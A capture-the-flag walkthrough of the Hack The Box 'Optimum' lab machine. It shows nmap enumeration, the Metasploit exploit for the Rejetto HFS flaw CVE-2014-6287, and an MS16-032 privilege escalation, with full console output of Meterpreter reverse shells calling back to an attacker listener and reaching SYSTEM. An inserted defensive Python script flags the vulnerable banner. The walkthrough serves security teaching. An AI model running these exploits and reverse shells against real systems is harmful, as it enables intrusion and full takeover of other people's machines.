7/15/2025

HTB: Optimum

 ___  ___  _________  ________                       
|\  \|\  \|\___   ___\\   __  \  ___                 
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                
 \ \   __  \   \ \  \ \ \   __  \|__|                
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___              
   \ \__\ \__\   \ \__\ \ \_______\|\__\             
    \|__|\|__|    \|__|  \|_______|\|__|             
 ________  ________  _________  ___                  
|\   __  \|\   __  \|\___   ___\\  \                 
\ \  \|\  \ \  \|\  \|___ \  \_\ \  \  ____________  
 \ \  \\\  \ \   ____\   \ \  \ \ \  \|\____________\
  \ \  \\\  \ \  \___|    \ \  \ \ \  \|____________|
   \ \_______\ \__\        \ \__\ \ \__\             
    \|_______|\|__|         \|__|  \|__|             
 _____ ______   ___  ___  _____ ______               
|\   _ \  _   \|\  \|\  \|\   _ \  _   \             
\ \  \\\__\ \  \ \  \\\  \ \  \\\__\ \  \            
 \ \  \\|__| \  \ \  \\\  \ \  \\|__| \  \           
  \ \  \    \ \  \ \  \\\  \ \  \    \ \  \          
   \ \__\    \ \__\ \_______\ \__\    \ \__\         
    \|__|     \|__|\|_______|\|__|     \|__|


Hack The Box's Optimum is an Easy, beginner-friendly Windows machine with a remote command execution vulnerability (CVE-2014-6287). This machine involves basic enumeration with Nmap, an easy-to-obtain exploit that is available as a Metasploit module, and some basic privilege escalation.

After starting the machine on HTB and connecting to your HTB VPN, open a terminal and ping the machine's IP address to confirm the host is reachable. Make sure the IP address you enter matches the one displayed on HTB when you boot the target machine.

ping 10.129.145.193

You should receive replies from the IP address. Press CTRL + C to stop sending packets to the target host. Once you have confirmed the host is reachable, it's time to move on to enumeration with Nmap.

Start with a quick service scan using Nmap. The -sV switch enables version detection, which reports the product and version behind each open port. You can learn more about Nmap here.

nmap -sV 10.129.145.193
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 17:58 CDT
Nmap scan report for 10.129.145.193
Host is up (0.082s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.66 seconds

Nmap reveals just one open service: HttpFileServer (HFS) version 2.3 on port 80. A bit of searching on the web reveals that this version has a remote command execution vulnerability (CVE-2014-6287). Let's fire up Metasploit and search for a matching exploit:
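Before reaching for an exploit, a defender would want to catch this exposure in their own scan results. The following Python script is an added example, not part of the original walkthrough: it parses `nmap -sV` text output like the scan above and flags the HttpFileServer banner against CVE-2014-6287. The rule table, the second sample host and the affected-version range (2.3 through 2.3b, as given in the public advisory) are assumptions of the example, not facts from the walkthrough.

```python
"""Flag known-vulnerable service banners in `nmap -sV` text output.

Added example, not part of the original walkthrough. The banner-to-CVE
table is a constructed, minimal mapping containing only the finding the
walkthrough establishes (HttpFileServer 2.3 -> CVE-2014-6287); a real
inventory check would be driven from a vulnerability database.
"""
import re
from dataclasses import dataclass

# Constructed sample: the scan output quoted in the walkthrough, plus one
# extra host so the parser is exercised on services that should not match.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 17:58 CDT
Nmap scan report for 10.129.145.193
Host is up (0.082s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 10.129.145.200
Host is up (0.050s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache httpd 2.4.57
"""


@dataclass
class Port:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class Finding:
    host: str
    port: int
    service: str
    version: str
    cve: str
    note: str


# "Nmap scan report for 10.129.145.193" (or "hostname (ip)") starts a host block.
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
# "80/tcp open  http    HttpFileServer httpd 2.3" -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_sv(text: str) -> list[Port]:
    """Return one Port per port line, attributed to the most recent host header."""
    ports: list[Port] = []
    host = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m and host is not None:
            ports.append(Port(host, int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
    return ports


def hfs_23_affected(ver: str) -> bool:
    """Assumed affected range for CVE-2014-6287: the 2.3 series before 2.3c."""
    return ver in ("2.3", "2.3a", "2.3b")


# Constructed rule table: (banner regex with a version capture group,
# predicate over the captured version, CVE, remediation note).
RULES = [
    (re.compile(r"HttpFileServer httpd (\d+\.\d+[a-z]?)"), hfs_23_affected,
     "CVE-2014-6287", "Rejetto HFS remote command execution; upgrade or remove the service"),
]


def match_findings(ports: list[Port]) -> list[Finding]:
    """Apply every rule to every open port's version banner."""
    findings: list[Finding] = []
    for p in ports:
        if p.state != "open":
            continue
        for banner_re, affected, cve, note in RULES:
            m = banner_re.search(p.version)
            if m and affected(m.group(1)):
                findings.append(Finding(p.host, p.port, p.service, m.group(1), cve, note))
    return findings


def scan_report(text: str) -> list[Finding]:
    return match_findings(parse_nmap_sv(text))


if __name__ == "__main__":
    for f in scan_report(SAMPLE_NMAP_OUTPUT):
        print(f"{f.host}:{f.port} {f.service} {f.version} -> {f.cve} ({f.note})")
```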

msfconsole
Metasploit tip: Network adapter names can be used for IP options set LHOST eth0


       =[ metasploit v6.4.43-dev                          ]
+ -- --=[ 2484 exploits - 1279 auxiliary - 431 post       ]
+ -- --=[ 1466 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search CVE-2014-6287

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

[msf](Jobs:0 Agents:0) >> 

Option #0 is a module for the remote command execution vulnerability. You can read more about this exploit on Rapid7's website here. Let's select it and fill out the required exploit options:

[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     209.151.153.12   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> set RHOSTS 10.129.145.193
RHOSTS => 10.129.145.193
[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> set LHOST 10.10.14.241
LHOST => 10.10.14.241
[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> 

We set RHOSTS to the target IP address and LHOST to the IP address of our VPN interface, which the target will connect back to for the reverse TCP connection. We can now run the exploit:

[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444 
[*] Using URL: http://10.10.14.241:8080/AC4Xw9vZoq
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /AC4Xw9vZoq
[*] Sending stage (177734 bytes) to 10.129.145.193
[!] Tried to delete %TEMP%\EnMMptsidRA.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.14.241:4444 -> 10.129.145.193:49162) at 2025-07-14 18:21:30 -0500
[*] Server stopped.

(Meterpreter 1)(C:\Users\kostas\Desktop) > 

We get a shell as the user kostas. We can now search the machine for the user.txt flag. But what about the root flag? We will need to escalate privileges, again using Metasploit. Let's background this session with the background command and search for a local exploit that fits our target system:

(Meterpreter 1)(C:\Documents and Settings\kostas\Desktop) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(windows/http/rejetto_hfs_exec) >> search exploit/windows/local

Matching Modules
================

   #    Name                                                                     Disclosure Date  Rank       Check  Description
   -    ----                                                                     ---------------  ----       -----  -----------
   0    exploit/windows/local/adobe_sandbox_adobecollabsync                      2013-05-14       great      Yes    AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass
   1    exploit/windows/local/agnitum_outpost_acs                                2013-08-02       excellent  Yes    Agnitum Outpost Internet Security Local Privilege Escalation
   2    exploit/windows/local/cve_2023_21768_afd_lpe                             2023-01-10       excellent  Yes    Ancillary Function Driver (AFD) for WinSock Elevation of Privilege
   3    exploit/windows/local/applocker_bypass                                   2015-08-03       excellent  No     AppLocker Execution Prevention Bypass
   4    exploit/windows/local/appxsvc_hard_link_privesc                          2019-04-09       normal     Yes    AppXSvc Hard Link Privilege Escalation
   5    exploit/windows/local/ps_wmi_exec                                        2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
   6    exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move             2020-03-10       excellent  Yes    Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability
   7    exploit/windows/local/cve_2020_17136                                     2020-03-10       normal     Yes    CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP
   8    exploit/windows/local/cve_2022_21999_spoolfool_privesc                   2022-02-08       normal     Yes    CVE-2022-21999 SpoolFool Privesc
   9    exploit/windows/local/canon_driver_privesc                               2021-08-07       normal     Yes    Canon Driver Privilege Escalation
   10   exploit/windows/local/anyconnect_lpe                                     2020-08-05       excellent  Yes    Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)
   11   exploit/windows/local/cve_2021_21551_dbutil_memmove                      2021-05-04       good       Yes    Dell DBUtil_2_3.sys IOCTL memmove
   12   exploit/windows/local/dnsadmin_serverlevelplugindll                      2017-05-08       normal     Yes    DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation
   13   exploit/windows/local/docker_credential_wincred                          2019-07-05       manual     Yes    Docker-Credential-Wincred.exe Privilege Escalation
   14   exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc   2020-02-25       excellent  Yes    Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation
   15   exploit/windows/local/gog_galaxyclientservice_privesc                    2020-04-28       excellent  Yes    GOG GalaxyClientService Privilege Escalation
   16   exploit/windows/local/ikeext_service                                     2012-10-09       good       Yes    IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL
   17     \_ target: Windows x86                                                 .                .          .      .
   18     \_ target: Windows x64                                                 .                .          .      .
   19   exploit/windows/local/cve_2017_8464_lnk_lpe                              2017-06-13       great      Yes    LNK Code Execution Vulnerability
   20     \_ target: Windows x64                                                 .                .          .      .
   21     \_ target: Windows x86                                                 .                .          .      .
   22   exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver            2022-11-09       good       Yes    Lenovo Diagnostics Driver IOCTL memmove
   23   exploit/windows/local/lenovo_systemupdate                                2015-04-12       excellent  Yes    Lenovo System Update Privilege Escalation
   24   exploit/windows/local/lexmark_driver_privesc                             2021-07-15       normal     Yes    Lexmark Driver Privilege Escalation
   25   exploit/windows/local/mqac_write                                         2014-07-22       average    Yes    MQAC.sys Arbitrary Write Privilege Escalation
   26   exploit/windows/local/ms11_080_afdjoinleaf                               2011-11-30       average    No     MS11-080 AfdJoinLeaf Privilege Escalation
   27     \_ target: Automatic                                                   .                .          .      .
   28     \_ target: Windows XP SP2 / SP3                                        .                .          .      .
   29     \_ target: Windows Server 2003 SP2                                     .                .          .      .
   30   exploit/windows/local/ms13_005_hwnd_broadcast                            2012-11-27       excellent  No     MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
   31     \_ target: Windows x86                                                 .                .          .      .
   32     \_ target: Windows x64                                                 .                .          .      .
   33   exploit/windows/local/ms13_097_ie_registry_symlink                       2013-12-10       great      No     MS13-097 Registry Symlink IE Sandbox Escape
   34   exploit/windows/local/ms_ndproxy                                         2013-11-27       average    Yes    MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation
   35     \_ target: Automatic                                                   .                .          .      .
   36     \_ target: Windows XP SP3                                              .                .          .      .
   37     \_ target: Windows Server 2003 SP2                                     .                .          .      .
   38   exploit/windows/local/ms14_009_ie_dfsvc                                  2014-02-11       great      Yes    MS14-009 .NET Deployment Service IE Sandbox Escape
   39   exploit/windows/local/bthpan                                             2014-07-18       average    Yes    MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
   40   exploit/windows/local/ms14_070_tcpip_ioctl                               2014-11-11       average    Yes    MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference
   41   exploit/windows/local/ntapphelpcachecontrol                              2014-09-30       normal     Yes    MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check
   42   exploit/windows/local/ms15_004_tswbproxy                                 2015-01-13       good       Yes    MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape
   43   exploit/windows/local/ms15_078_atmfd_bof                                 2015-07-11       manual     Yes    MS15-078 Microsoft Windows Font Driver Buffer Overflow
   44   exploit/windows/local/ms16_016_webdav                                    2016-02-09       excellent  Yes    MS16-016 mrxdav.sys WebDav Local Privilege Escalation
   45   exploit/windows/local/ms16_032_secondary_logon_handle_privesc            2016-03-21       normal     Yes    MS16-032 Secondary Logon Handle Privilege Escalation
   46     \_ target: Windows x86                                                 .                .          .      .
   47     \_ target: Windows x64                                                 .                .          .      .
   48   exploit/windows/local/microfocus_operations_privesc                      2020-10-28       excellent  No     Micro Focus Operations Bridge Manager / Reporter Local Privilege Escalation
   49     \_ target: Micro Focus Operations Bridge Manager (Windows) <= 2020.05  .                .          .      .
   50     \_ target: Micro Focus Operations Bridge Reporter (Windows) <= 10.40   .                .          .      .
   51   exploit/windows/local/win_error_cve_2023_36874                           2023-07-11       excellent  Yes    Microsoft Error Reporting Local Privilege Elevation Vulnerability
   52   exploit/windows/local/cve_2020_1048_printerdemon                         2019-11-04       normal     Yes    Microsoft Spooler Local Privilege Elevation Vulnerability
   53   exploit/windows/local/cve_2020_1337_printerdemon                         2019-11-04       excellent  Yes    Microsoft Spooler Local Privilege Elevation Vulnerability
   54   exploit/windows/local/comahawk                                           2019-11-12       excellent  No     Microsoft UPnP Local Privilege Elevation Vulnerability
   55   exploit/windows/local/alpc_taskscheduler                                 2018-08-27       normal     No     Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
   56   exploit/windows/local/cve_2020_1054_drawiconex_lpe                       2020-02-20       normal     Yes    Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation
   57   exploit/windows/local/ntusermndragover                                   2019-03-12       normal     Yes    Microsoft Windows NtUserMNDragOver Local Privilege Elevation
   58   exploit/windows/local/mov_ss                                             2018-05-08       excellent  No     Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
   59   exploit/windows/local/cve_2019_1458_wizardopium                          2019-12-10       normal     Yes    Microsoft Windows Uninitialized Variable Local Privilege Elevation
   60   exploit/windows/local/nscp_pe                                            2020-10-20       excellent  Yes    NSClient++ 0.5.2.35 - Privilege escalation
   61   exploit/windows/local/novell_client_nicm                                 2013-05-22       average    Yes    Novell Client 2 SP3 nicm.sys Local Privilege Escalation
   62     \_ target: Automatic                                                   .                .          .      .
   63     \_ target: Windows 7 SP1                                               .                .          .      .
   64   exploit/windows/local/novell_client_nwfs                                 2008-06-26       average    No     Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation
   65     \_ target: Automatic                                                   .                .          .      .
   66     \_ target: Windows XP SP3                                              .                .          .      .
   67   exploit/windows/local/nvidia_nvsvc                                       2012-12-25       average    Yes    Nvidia (nvsvc) Display Driver Service Local Privilege Escalation
   68   exploit/windows/local/pxeexploit                                         2011-08-05       excellent  No     PXE Exploit Server
   69   exploit/windows/local/panda_psevents                                     2016-06-27       excellent  Yes    Panda Security PSEvents Privilege Escalation
   70     \_ target: Windows x86                                                 .                .          .      .
   71     \_ target: Windows x64                                                 .                .          .      .
   72   exploit/windows/local/vss_persistence                                    2011-10-21       excellent  No     Persistent Payload in Windows Volume Shadow Copy
   73   exploit/windows/local/plantronics_hub_spokesupdateservice_privesc        2019-08-30       excellent  Yes    Plantronics Hub SpokesUpdateService Privilege Escalation
   74   exploit/windows/local/ps_persist                                         2012-08-14       excellent  No     Powershell Payload Execution
   75   exploit/windows/local/powershell_remoting                                1999-01-01       excellent  No     Powershell Remoting Remote Command Execution
   76   exploit/windows/local/current_user_psexec                                1999-01-01       excellent  No     PsExec via Current User Token
   77   exploit/windows/local/razer_zwopenprocess                                2017-03-22       normal     Yes    Razer Synapse rzpnk.sys ZwOpenProcess
   78   exploit/windows/local/ricoh_driver_privesc                               2020-01-22       normal     Yes    Ricoh Driver Privilege Escalation
   79   exploit/windows/local/cve_2020_0796_smbghost                             2020-03-13       good       Yes    SMBv3 Compression Buffer Overflow
   80     \_ AKA: SMBGhost                                                       .                .          .      .
   81     \_ AKA: CoronaBlue                                                     .                .          .      .
   82   exploit/windows/local/bits_ntlm_token_impersonation                      2019-12-06       great      Yes    SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
   83   exploit/windows/local/cve_2020_0668_service_tracing                      2020-02-11       excellent  No     Service Tracing Privilege Elevation Vulnerability
   84   exploit/windows/local/cve_2022_26904_superprofile                        2022-03-17       excellent  Yes    User Profile Arbitrary Junction Creation Local Privilege Elevation
   85   exploit/windows/local/virtual_box_opengl_escape                          2014-03-11       average    Yes    VirtualBox 3D Acceleration Virtual Machine Escape
   86   exploit/windows/local/virtual_box_guest_additions                        2014-07-15       average    Yes    VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation
   87   exploit/windows/local/wmi_persistence                                    2017-06-06       normal     No     WMI Event Subscription Persistence
   88   exploit/windows/local/webexec                                            2018-10-09       good       Yes    WebEx Local Service Permissions Exploit
   89     \_ target: Automatic                                                   .                .          .      .
   90     \_ target: Windows x86                                                 .                .          .      .
   91     \_ target: Windows x64                                                 .                .          .      .
   92   exploit/windows/local/cve_2022_21882_win32k                              2021-02-09       average    Yes    Win32k ConsoleControl Offset Confusion
   93   exploit/windows/local/cve_2021_40449                                     2021-10-12       good       Yes    Win32k NtGdiResetDC Use After Free Local Privilege Elevation
   94   exploit/windows/local/bypassuac_windows_store_filesys                    2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
   95   exploit/windows/local/bypassuac_windows_store_reg                        2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
   96   exploit/windows/local/cve_2024_35250_ks_driver                           2024-06-11       excellent  Yes    Windows Access Mode Mismatch LPE in ks.sys
   97   exploit/windows/local/always_install_elevated                            2010-03-18       excellent  Yes    Windows AlwaysInstallElevated MSI
   98   exploit/windows/local/capcom_sys_exec                                    1999-01-01       normal     Yes    Windows Capcom.sys Kernel Execution Exploit (x64 only)
   99   exploit/windows/local/ms15_051_client_copy_image                         2015-05-12       normal     Yes    Windows ClientCopyImage Win32k Exploit
   100    \_ target: Windows x86                                                 .                .          .      .
   101    \_ target: Windows x64                                                 .                .          .      .
   102  exploit/windows/local/powershell_cmd_upgrade                             1999-01-01       excellent  No     Windows Command Shell Upgrade (Powershell)
   103  exploit/windows/local/cve_2023_28252_clfs_driver                         2023-04-11       good       Yes    Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability
   104  exploit/windows/local/ppr_flatten_rec                                    2013-05-15       average    Yes    Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
   105  exploit/windows/local/service_permissions                                2012-10-15       great      No     Windows Escalate Service Permissions Local Privilege Escalation
   106  exploit/windows/local/ms10_092_schelevator                               2010-09-13       excellent  Yes    Windows Escalate Task Scheduler XML Privilege Escalation
   107    \_ target: Windows Vista / 7 / 2008 (Dropper)                          .                .          .      .
   108    \_ target: Windows Vista / 7 / 2008 (Command)                          .                .          .      .
   109  exploit/windows/local/ask                                                2012-01-03       excellent  No     Windows Escalate UAC Execute RunAs
   110  exploit/windows/local/bypassuac                                          2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   111    \_ target: Windows x86                                                 .                .          .      .
   112    \_ target: Windows x64                                                 .                .          .      .
   113  exploit/windows/local/bypassuac_injection                                2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   114    \_ target: Windows x86                                                 .                .          .      .
   115    \_ target: Windows x64                                                 .                .          .      .
   116  exploit/windows/local/bypassuac_injection_winsxs                         2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   117    \_ target: Windows x86                                                 .                .          .      .
   118    \_ target: Windows x64                                                 .                .          .      .
   119  exploit/windows/local/bypassuac_vbs                                      2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   120  exploit/windows/local/bypassuac_comhijack                                1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   121  exploit/windows/local/bypassuac_eventvwr                                 2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   122    \_ target: Windows x86                                                 .                .          .      .
   123    \_ target: Windows x64                                                 .                .          .      .
   124  exploit/windows/local/bypassuac_sdclt                                    2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
   125  exploit/windows/local/bypassuac_silentcleanup                            2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
   126  exploit/windows/local/bypassuac_dotnet_profiler                          2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
   127  exploit/windows/local/cve_2024_30088_authz_basep                         2024-06-11       excellent  Yes    Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes
   128  exploit/windows/local/payload_inject                                     2011-10-12       excellent  No     Windows Manage Memory Payload Injection
   129  exploit/windows/local/s4u_persistence                                    2013-01-02       excellent  No     Windows Manage User Level Persistent Payload Installer
   130  exploit/windows/local/wmi                                                1999-01-01       excellent  No     Windows Management Instrumentation (WMI) Remote Command Execution
   131  exploit/windows/local/ms13_053_schlamperei                               2013-12-01       average    Yes    Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
   132  exploit/windows/local/ms16_075_reflection                                2016-01-16       normal     Yes    Windows Net-NTLMv2 Reflection DCOM/RPC
   133    \_ target: Automatic                                                   .                .          .      .
   134    \_ target: Windows x86                                                 .                .          .      .
   135    \_ target: Windows x64                                                 .                .          .      .
   136  exploit/windows/local/ms16_075_reflection_juicy                          2016-01-16       great      Yes    Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)
   137  exploit/windows/local/cve_2018_8453_win32k_priv_esc                      2018-10-09       manual     No     Windows NtUserSetWindowFNID Win32k User Callback
   138  exploit/windows/local/persistence                                        2011-10-19       excellent  No     Windows Persistent Registry Startup Payload Installer
   139  exploit/windows/local/persistence_service                                2018-10-20       excellent  No     Windows Persistent Service Installer
   140  exploit/windows/local/tokenmagic                                         2017-05-25       excellent  Yes    Windows Privilege Escalation via TokenMagic (UAC Bypass)
   141  exploit/windows/local/registry_persistence                               2015-07-01       excellent  Yes    Windows Registry Only Persistence
   142  exploit/windows/local/run_as                                             1999-01-01       excellent  No     Windows Run Command As User
   143  exploit/windows/local/ms10_015_kitrap0d                                  2010-01-19       great      Yes    Windows SYSTEM Escalation via KiTrap0D
   144  exploit/windows/local/srclient_dll_hijacking                             2021-02-19       normal     Yes    Windows Server 2012 SrClient DLL hijacking
   145  exploit/windows/local/ms18_8120_win32k_privesc                           2018-05-09       good       No     Windows SetImeInfoEx Win32k NULL Pointer Dereference
   146    \_ target: Automatic                                                   .                .          .      .
   147    \_ target: Windows 7 x64                                               .                .          .      .
   148    \_ target: Windows 7 x86                                               .                .          .      .
   149  exploit/windows/local/persistence_image_exec_options                     2008-06-28       excellent  No     Windows Silent Process Exit Persistence
   150  exploit/windows/local/ms14_058_track_popup_menu                          2014-10-14       normal     Yes    Windows TrackPopupMenu Win32k NULL Pointer Dereference
   151    \_ target: Windows x86                                                 .                .          .      .
   152    \_ target: Windows x64                                                 .                .          .      .
   153  exploit/windows/local/ms13_081_track_popup_menu                          2013-10-08       average    Yes    Windows TrackPopupMenuEx Win32k NULL Page
   154  exploit/windows/local/bypassuac_fodhelper                                2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   155    \_ target: Windows x86                                                 .                .          .      .
   156    \_ target: Windows x64                                                 .                .          .      .
   157  exploit/windows/local/bypassuac_sluihijack                               2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   158    \_ target: Windows x86                                                 .                .          .      .
   159    \_ target: Windows x64                                                 .                .          .      .
   160  exploit/windows/local/unquoted_service_path                              2001-10-25       great      Yes    Windows Unquoted Service Path Privilege Escalation
   161  exploit/windows/local/cve_2020_1313_system_orchestrator                  2019-11-04       excellent  Yes    Windows Update Orchestrator unchecked ScheduleWork call
   162  exploit/windows/local/ms16_014_wmi_recv_notif                            2015-12-04       normal     Yes    Windows WMI Receive Notification Exploit
   163  exploit/windows/local/windscribe_windscribeservice_priv_esc              2018-05-24       excellent  Yes    Windscribe WindscribeService Named Pipe Privilege Escalation
   164  exploit/windows/local/ipass_launch_app                                   2015-03-12       excellent  Yes    iPass Mobile Client Service Privilege Escalation


Interact with a module by name or index. For example info 164, use 164 or use exploit/windows/local/ipass_launch_app

[msf](Jobs:0 Agents:1) exploit(windows/http/rejetto_hfs_exec) >> 

We receive a fairly large list of results from our search. After searching and testing through the list of privilege escalation options, we find one labeled MS16-032 Secondary Logon Handle Privilege Escalation. We can use option 47, since our target machine uses the x64 architecture. After setting the exploit's options, let's give it a try:

[msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444 
[+] Compressed size: 1160
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\SOMHVxRLiljsx.ps1...
[*] Compressing script contents...
[+] Compressed size: 3737
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___ 
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	                                    
	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1844

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+         $apCb = [Ntdll]::NtImpersonateThread($hPZ, $hPZ, [ref]$lMyt)
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (lMyt:VariablePath) [], Runtim 
   eException
    + FullyQualifiedErrorId : NonExistingVariableReference
 
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+     $apCb = [Advapi32]::DuplicateToken($tR, 2, [ref]$yYvW)
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
 
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

r3DS97QrRD9gWYe3NeRgiWVTzF1m4UtB
[+] Executed on target machine.
[*] Sending stage (203846 bytes) to 10.129.145.193
[*] Meterpreter session 2 opened (10.10.14.241:4444 -> 10.129.145.193:49163) at 2025-07-14 18:38:40 -0500
[+] Deleted C:\Users\kostas\AppData\Local\Temp\SOMHVxRLiljsx.ps1

(Meterpreter 2)(C:\Documents and Settings\kostas\Desktop) >

We get another shell. We can run the getuid command to receive the following results, confirming the privilege escalation has worked!

(Meterpreter 2)(C:\Documents and Settings\kostas\Desktop) > getuid
Server username: NT AUTHORITY\SYSTEM

